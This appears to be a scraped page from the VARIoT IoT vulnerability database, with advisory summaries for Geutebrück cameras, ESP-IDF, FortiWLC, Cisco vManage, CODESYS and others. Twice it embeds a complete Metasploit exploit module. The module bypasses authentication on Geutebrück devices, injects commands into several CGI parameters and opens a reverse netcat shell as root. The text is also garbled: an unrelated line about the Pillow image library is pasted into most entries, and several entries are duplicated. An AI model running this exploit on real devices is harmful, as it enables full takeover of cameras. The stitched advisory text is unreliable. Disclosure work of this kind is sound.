VARIoT IoT vulnerabilities database

Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. }, 'Author' => [ 'Titouan Lazard', # Of RandoriSec - Discovery 'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module 'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2021-33543'], ['CVE', '2021-33544'], ['CVE', '2021-33548'], ['CVE', '2021-33550'], ['CVE', '2021-33551'], ['CVE', '2021-33552'], ['CVE', '2021-33553'], ['CVE', '2021-33554'], [ 'URL', 'http://geutebruck.com' ], [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'], [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03'] ], 'DisclosureDate' => '2021-07-08', 'Privileged' => true, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'CVE-2021-33544 - certmngr.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'createselfcert', 'local' => Rex::Text.rand_text_alphanumeric(10..16), 'country' => Rex::Text.rand_text_alphanumeric(2), 'state' => '$(PLACEHOLDER_CMD)', 'organization' => Rex::Text.rand_text_alphanumeric(10..16), 'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16), 'commonname' => Rex::Text.rand_text_alphanumeric(10..16), 'days' => Rex::Text.rand_text_numeric(2..4), 'type' => Rex::Text.rand_text_numeric(2..4) }, 'uri' => '/../uapi-cgi/certmngr.cgi' } ], [ 'CVE-2021-33548 - factory.cgi', { 'http_method' => 'GET', 'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/factory.cgi' } ], [ 'CVE-2021-33550 - language.cgi', { 'http_method' => 'GET', 'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/language.cgi' } ], [ 'CVE-2021-33551 - oem.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'set', 'enable' => 'yes', 'environment.lang' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/oem.cgi' } ], [ 'CVE-2021-33552 - simple_reclistjs.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'get', 'timekey' => Rex::Text.rand_text_numeric(2..4), 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/simple_reclistjs.cgi' } ], [ 'CVE-2021-33553 - testcmd.cgi', { 'http_method' => 'GET', 'http_vars' => { 'command' => 'PLACEHOLDER_CMD' }, 'uri' => '/../uapi-cgi/testcmd.cgi' } ], [ 'CVE-2021-33554 - tmpapp.cgi', { 'http_method' => 'GET', 'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/tmpapp.cgi' } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' }, 'Notes' => { 'Stability' => ['CRASH_SAFE'], 'Reliability' => ['REPEATABLE_SESSION'], 'SideEffects' => ['ARTIFACTS_ON_DISK'] } ) ) end def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end unless res&.body && !res.body.empty? print_error('Empty body in the response!') return false end res_xml = res.get_xml_document if res_xml.at('//firmware').nil? print_error('Target did not respond with a XML document containing the "firmware" element!') return false end raw_text = res_xml.at('//firmware').text if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/) raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0] else print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!') false end end def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end rex_version = Rex::Version.new(version) vprint_status("Found Geutebruck version #{rex_version}") if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5') return CheckCode::Appears end CheckCode::Safe end def exploit print_status("#{rhost}:#{rport} - Setting up request...") method = target['http_method'] if method == 'GET' http_method_vars = 'vars_get' else http_method_vars = 'vars_post' end http_vars = target['http_vars'] http_vars.each do |(k, v)| if v.include? 'PLACEHOLDER_CMD' http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded end end print_status("Sending CMD injection request to #{rhost}:#{rport}") send_request_cgi( { 'method' => method, 'uri' => target['uri'], http_method_vars => http_vars } ) print_status('Exploit complete, you should get a shell as the root user!') end end

Multiple camera devices by UDP Technology, Geutebrück and other vendors allow unauthenticated remote access to sensitive files due to default user authentication settings. This can lead to manipulation of the device and denial of service. GEUTEBRUCK Provided by the company G-Cam E2 and G-Code The following multiple vulnerabilities exist in. * Lack of authentication for important features (CWE-306) - CVE-2021-33543 ‥ * Command injection (CWE-77) - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * Stack-based buffer overflow (CWE-121) - CVE-2021-33545 , CVE-2021-33546 , CVE-2021-33547 , CVE-2021-33549The expected impact depends on each vulnerability, but it may be affected as follows. * Confidential information stolen by a remote third party due to improper default user authentication settings - CVE-2021-33543 ‥ * Arbitrary code executed by command injection by a remote third party - CVE-2021-33544 , CVE-2021-33548 , CVE-2021-33550 , CVE-2021-33551 , CVE-2021-33552 , CVE-2021-33553 , CVE-2021-33554 ‥ * By a remote third party counter Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33545 ‥ * By a remote third party name Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33546 ‥ * By a remote third party profile Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33547 ‥ * By a remote third party action Parameter buffer overflow is triggered and arbitrary code is executed - CVE-2021-33549. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Geutebruck Multiple Remote Command Execution', 'Description' => %q{ This module bypasses the HTTP basic authentication used to access the /uapi-cgi/ folder and exploits multiple authenticated arbitrary command execution vulnerabilities within the parameters of various pages on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user. }, 'Author' => [ 'Titouan Lazard', # Of RandoriSec - Discovery 'Ibrahim Ayadhi', # Of RandoriSec - Discovery and Metasploit Module 'Sébastien Charbonnier' # Of RandoriSec - Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2021-33543'], ['CVE', '2021-33544'], ['CVE', '2021-33548'], ['CVE', '2021-33550'], ['CVE', '2021-33551'], ['CVE', '2021-33552'], ['CVE', '2021-33553'], ['CVE', '2021-33554'], [ 'URL', 'http://geutebruck.com' ], [ 'URL', 'https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/'], [ 'URL', 'https://us-cert.cisa.gov/ics/advisories/icsa-21-208-03'] ], 'DisclosureDate' => '2021-07-08', 'Privileged' => true, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'CVE-2021-33544 - certmngr.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'createselfcert', 'local' => Rex::Text.rand_text_alphanumeric(10..16), 'country' => Rex::Text.rand_text_alphanumeric(2), 'state' => '$(PLACEHOLDER_CMD)', 'organization' => Rex::Text.rand_text_alphanumeric(10..16), 'organizationunit' => Rex::Text.rand_text_alphanumeric(10..16), 'commonname' => Rex::Text.rand_text_alphanumeric(10..16), 'days' => Rex::Text.rand_text_numeric(2..4), 'type' => Rex::Text.rand_text_numeric(2..4) }, 'uri' => '/../uapi-cgi/certmngr.cgi' } ], [ 'CVE-2021-33548 - factory.cgi', { 'http_method' => 'GET', 'http_vars' => { 'preserve' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/factory.cgi' } ], [ 'CVE-2021-33550 - language.cgi', { 'http_method' => 'GET', 'http_vars' => { 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/language.cgi' } ], [ 'CVE-2021-33551 - oem.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'set', 'enable' => 'yes', 'environment.lang' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/oem.cgi' } ], [ 'CVE-2021-33552 - simple_reclistjs.cgi', { 'http_method' => 'GET', 'http_vars' => { 'action' => 'get', 'timekey' => Rex::Text.rand_text_numeric(2..4), 'date' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/simple_reclistjs.cgi' } ], [ 'CVE-2021-33553 - testcmd.cgi', { 'http_method' => 'GET', 'http_vars' => { 'command' => 'PLACEHOLDER_CMD' }, 'uri' => '/../uapi-cgi/testcmd.cgi' } ], [ 'CVE-2021-33554 - tmpapp.cgi', { 'http_method' => 'GET', 'http_vars' => { 'appfile.filename' => '$(PLACEHOLDER_CMD)' }, 'uri' => '/../uapi-cgi/tmpapp.cgi' } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' }, 'Notes' => { 'Stability' => ['CRASH_SAFE'], 'Reliability' => ['REPEATABLE_SESSION'], 'SideEffects' => ['ARTIFACTS_ON_DISK'] } ) ) end def firmware res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) unless res print_error('Connection failed!') return false end unless res&.body && !res.body.empty? print_error('Empty body in the response!') return false end res_xml = res.get_xml_document if res_xml.at('//firmware').nil? print_error('Target did not respond with a XML document containing the "firmware" element!') return false end raw_text = res_xml.at('//firmware').text if raw_text && raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/) raw_text.match(/\d\.\d{1,3}\.\d{1,3}\.\d{1,3}/)[0] else print_error('Target responded with a XML document containing the "firmware" element but its not a valid version string!') false end end def check version = firmware if version == false return CheckCode::Unknown('Target did not respond with a valid XML response that we could retrieve the version from!') end rex_version = Rex::Version.new(version) vprint_status("Found Geutebruck version #{rex_version}") if rex_version <= Rex::Version.new('1.12.0.27') || rex_version == Rex::Version.new('1.12.13.2') || rex_version == Rex::Version.new('1.12.14.5') return CheckCode::Appears end CheckCode::Safe end def exploit print_status("#{rhost}:#{rport} - Setting up request...") method = target['http_method'] if method == 'GET' http_method_vars = 'vars_get' else http_method_vars = 'vars_post' end http_vars = target['http_vars'] http_vars.each do |(k, v)| if v.include? 'PLACEHOLDER_CMD' http_vars[k]['PLACEHOLDER_CMD'] = payload.encoded end end print_status("Sending CMD injection request to #{rhost}:#{rport}") send_request_cgi( { 'method' => method, 'uri' => target['uri'], http_method_vars => http_vars } ) print_status('Exploit complete, you should get a shell as the root user!') end end

The Bluetooth Classic implementation in Espressif ESP-IDF 4.4 and earlier does not properly handle the reception of multiple LMP IO Capability Request packets during the pairing process, allowing attackers in radio range to trigger memory corruption (and consequently a crash) in ESP32 via a replayed (duplicated) LMP packet. Espressif ESP-IDF Exists in an out-of-bounds write vulnerability.Service operation interruption (DoS) It may be in a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. Espressif ESP-IDF is a development framework for the Internet of Things developed by Espressif. There is a buffer error vulnerability in Espressif ESP-IDF, which originates from the Bluetooth classic implementation in Espressif ESP-IDF 4.4 and earlier versions

An improper neutralization of input during web page generation in FortiWLC version 8.6.0, version 8.5.3 and below, version 8.4.8 and below, version 8.3.3 web interface may allow both authenticated remote attackers and non-authenticated attackers in the same network as the appliance to perform a stored cross site scripting attack (XSS) via injecting malicious payloads in different locations. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

An improper access control (CWE-284) vulnerability in FortiWLC version 8.6.0, version 8.5.3 and below, version 8.4.8 and below, version 8.3.3 and below, version 8.2.7 to 8.2.4, version 8.1.3 may allow an unauthenticated and remote attacker to access certain areas of the web management CGI functionality by just specifying the correct URL. The vulnerability applies only to limited CGI resources and might allow the unauthorized party to access configuration details. fortinet's FortiWLC contains an access control vulnerability.Information may be obtained. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

A use of hard-coded password vulnerability in FortiWLC version 8.5.2 and below, version 8.4.8 and below, version 8.3.3 to 8.3.2, version 8.2.7 to 8.2.6 may allow a local, authenticated attacker to connect to the managed Access Point (Meru AP and FortiAP-U) as root using the default hard-coded username and password. fortinet's FortiWLC contains vulnerabilities related to access control and the use of hard-coded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

A vulnerability in the cluster management interface of Cisco&nbsp;SD-WAN vManage Software could allow an unauthenticated, remote attacker to view sensitive information on an affected system. To be affected by this vulnerability, the vManage software must be in cluster mode. This vulnerability is due to the absence of authentication for sensitive information in the cluster management interface. An attacker could exploit this vulnerability by sending a crafted request to the cluster management interface of an affected system. A successful exploit could allow the attacker to view sensitive information on the affected system.Cisco&nbsp;has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager contains a vulnerability that allows sensitive information to be leaked to unauthorized control areas.Information may be obtained. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-vmaninfdis3-OvdR6uu8

A vulnerability in the web-based management interface of Cisco&nbsp;SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization checking and gain access to sensitive information on an affected system. This vulnerability is due to insufficient authorization checks. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to bypass authorization checking and gain access to sensitive information on the affected system.Cisco&nbsp;has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager There is an input validation vulnerability in.Information may be obtained and information may be tampered with. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-auth-bypass-Z3Zze5XC

A vulnerability in the web-based management interface of Cisco&nbsp;SD-WAN vManage Software could allow an authenticated, remote attacker to conduct Cypher query language injection attacks on an affected system. This vulnerability is due to insufficient input validation by the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the interface of an affected system. A successful exploit could allow the attacker to obtain sensitive information.Cisco&nbsp;has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager contains a vulnerability related to improper neutralization of special elements in the data query logic.Information may be obtained. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-cql-inject-c7z9QqyB

A vulnerability in the web UI of Cisco&nbsp;SD-WAN vManage Software could allow an authenticated, remote attacker to gain read and write access to information that is stored on an affected system. This vulnerability is due to improper handling of XML External Entity (XXE) entries when the affected software parses certain XML files. An attacker could exploit this vulnerability by persuading a user to import a crafted XML file with malicious entries. A successful exploit could allow the attacker to read and write files within the affected application.Cisco&nbsp;has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager for, XML There is a vulnerability in an external entity.Information may be obtained and information may be tampered with. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-xml-ext-entity-q6Z7uVUg

A vulnerability in the web UI of Cisco&nbsp;SD-WAN vManage Software could allow an authenticated, remote attacker to inject arbitrary commands on an affected system and cause a denial of service (DoS) condition. This vulnerability is due to improper input validation of user-supplied input to the device template configuration. An attacker could exploit this vulnerability by submitting crafted input to the device template configuration. A successful exploit could allow the attacker to cause a DoS condition on the affected system.Cisco&nbsp;has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager Exists in a vulnerability in inserting or modifying arguments.Service operation interruption (DoS) It may be in a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-cmdinj-nRHKgfHX

A vulnerability in the web-based management interface of Cisco&nbsp;SD-WAN vManage Software could allow an authenticated, remote attacker to read arbitrary files on the underlying file system of the device. This vulnerability is due to insufficient file scope limiting. An attacker could exploit this vulnerability by creating a specific file reference on the file system and then accessing it through the web-based management interface. A successful exploit could allow the attacker to read arbitrary files from the file system of the underlying operating system.Cisco&nbsp;has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. Cisco Systems Cisco Catalyst SD-WAN Manager Exists in a link interpretation vulnerability.Information may be obtained. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. This advisory is available at the following link:tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vmanage-info-disclos-gGvm9Mfu

CODESYS V2 Web-Server before 1.1.9.20 has an Improperly Implemented Security Check. CODESYS V2 Web-Server Contains an improper authentication vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

CODESYS V2 Web-Server before 1.1.9.20 has Improper Access Control. CODESYS V2 Web-Server There is a vulnerability in the lack of authentication for critical features.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

CODESYS V2 Web-Server before 1.1.9.20 has a Stack-based Buffer Overflow. CODESYS V2 Web-Server Is vulnerable to an out-of-bounds write.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Pillow is a Python-based image processing library. There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements

Tangshan Liulin Automation Equipment Co., Ltd. is a high-tech enterprise specializing in the research and development, production, sales and system engineering technical services of the security communication terminal and smart application platform software of the Internet of Things. There is a SQL injection vulnerability in the water rights trading system. Attackers can use the vulnerability to obtain sensitive information in the database.

Tangshan Liulin Automation Equipment Co., Ltd. is a high-tech enterprise specializing in the research and development, production, sales and system engineering technical services of the security communication terminal and smart application platform software of the Internet of Things. There is a SQL injection vulnerability in the water rights trading system. Attackers can use the vulnerability to obtain sensitive information in the database.

Tangshan Liulin Automation Equipment Co., Ltd. is a high-tech enterprise specializing in the research and development, production, sales and system engineering technical services of the security communication terminal and smart application platform software of the Internet of Things. There is a SQL injection vulnerability in the water rights trading system. Attackers can use the vulnerability to obtain sensitive information in the database.

Tangshan Liulin Automation Equipment Co., Ltd. is a high-tech enterprise specializing in the research and development, production, sales and system engineering technical services of the security communication terminal and smart application platform software of the Internet of Things. There is a SQL injection vulnerability in the water rights trading system. Attackers can use the vulnerability to obtain sensitive information in the database.